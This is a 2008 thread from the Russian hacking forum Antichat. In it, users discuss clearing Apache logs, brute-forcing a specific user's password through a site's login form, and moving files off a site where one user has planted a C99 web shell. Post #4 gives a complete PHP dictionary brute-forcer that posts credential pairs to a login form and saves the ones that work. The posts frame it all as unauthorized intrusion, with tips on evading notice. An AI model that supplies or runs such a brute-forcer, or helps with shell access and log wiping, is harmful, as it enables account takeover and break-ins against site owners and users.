HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.11.2008, 14:17
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию

Цитата:
Сообщение от diznt  
_Pantera_ а по нормальному можно???
У тебя нет доступа к логам апача. Только если ты пользователь с максимальными правами(в линуксе - root), ты можешь их почистить. Хз где лежат в твоем случае. Скорей всего на уровень выше от корня www-дирректории.

Последний раз редактировалось ChaaK; 08.11.2008 в 14:20..
 
Ответить с цитированием

  #2  
Старый 08.11.2008, 14:43
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

Есть отличные команды в никсах:
find и locate - вот и ищи логи.
А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.

Последний раз редактировалось $n@ke; 08.11.2008 в 14:49.. Причина: ошибочка
 
Ответить с цитированием

  #3  
Старый 08.11.2008, 17:58
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

Незнал где спросить, запостил сюда.

Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
 
Ответить с цитированием

  #4  
Старый 08.11.2008, 19:54
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Цитата:
Сообщение от samarin  
Незнал где спросить, запостил сюда.

Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?


PHP код:
<?################Брутфорс  Форм##################
///////////////////////----(c) nc.STRIEM----//////////////////////////
    
$filepas="file.txt" ///файл   с данными для брута
    
$filegood="good.txt"///файл с подходящими паролями
    
$endifg=1///закончить при первом же найденом 1-да 0-нет
    
    
$iskl=array();
//////строки которых не  должно быть в правельных страницах/////////
     
$iskl[0]="Неверный пароль";
    
//$iskl[1]="Неверная длина пароля!";
    //$iskl[2]="ERROR";
    //$iskl[3]="Ошибка";
    
//////////////////////////////////////////////////////////////////
    
$host="localhost";  ///хост
    
$script="/form.php";     ///скрипт 
                                    
///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////    
    
$header="POST http://$host$script HTTP/1.0\r\n";
    
$header.= "Host: $host\r\n";
    
$header.= "Content-Type: application/x-www-form-urlencoded\r\n";
//////Не обязательные параметры! но не всегда///
    //$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
    //$header.="Accept-Language: ru\r\n";
    //$header.= "Proxy-Connection: Keep-Alive\r\n";
    //$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
    //$header.="Referer:  http://microsoft.com\r\n";
    //$header.="Cookie: CREATED=nc.STRIEM\r\n";
####################################Сам брут#####################################    
    
set_time_limit(0);
    
$fo=fopen($filepas,"r");
    
$kolvoporolei=0;
    
$timestart=time('U');
    
$fgo=fopen($filegood,"a");
    echo 
"<h3><center>Мы брутили http://$host$script</center></h3>";
 while(!
feof($fo))
 {
/////////////////////////////////////////////
$fp fsockopen("www.".$host80$errno$errstr30);
if (!
$fp
    echo 
"$errstr ($errno)<br />\n";
 else 
 {
  
$kolvoporolei++;
   
$dan=rtrim(fgets($fo));  /////берем данные из файла
    
$dannii=split(';',$dan);
    
    
$out=$header;
    
$zapr="login=$dannii[0]&password=$dannii[1]";     ////имена переменных и их значения сюда
    
$contleng=strlen($zapr);
    
$out.= "Content-Length: $contleng\r\n";
    
$out.= "Pragma: no-cache\r\n\r\n";
    
$out.= "$zapr\r\n\r\n";

     
fwrite($fp$out);
    
$conte="";
 while (!
feof($fp)) 
   
$conte.=fgets($fp);
   
  
$est=1;
for(
$i=0;$i<sizeof($iskl);$i++)
   if(
strstr($conte$iskl[$i]))
     {
     
$est=0;
     break;
     }
/////может понадобиться при настройки///
//echo htmlspecialchars($conte); break;
/////////////////////////////////
if($est)
   {
   
fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
   echo 
"<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
   if(
$endifg)
      break;
    }
     
fclose($fp);
  }
}
//////////////////////////////////////////////////////////////////////////////////////////
fclose($fgo);
$time=time('U')-$timestart;
echo 
"<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>nc.striem@mail.ru</tt></center></h4>";
?>
 
Ответить с цитированием

  #5  
Старый 08.11.2008, 18:44
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

2samarin

wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток

если не найдешь могу скинуть на почту
 
Ответить с цитированием

  #6  
Старый 08.11.2008, 19:32
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

wwwhack с https не работает. Есть ли еще какие нибудь варианты?
 
Ответить с цитированием

  #7  
Старый 08.11.2008, 20:50
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

как раскрыть пути в Zeus Web Server? ))
 
Ответить с цитированием

  #8  
Старый 09.11.2008, 02:35
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

Всем здрасти....
Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
 
Ответить с цитированием

  #9  
Старый 09.11.2008, 02:58
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Только под своим ипом обязательно!!!!)
Какой шелл?
 
Ответить с цитированием

  #10  
Старый 09.11.2008, 03:03
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

С99 madnet edition

штоле
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.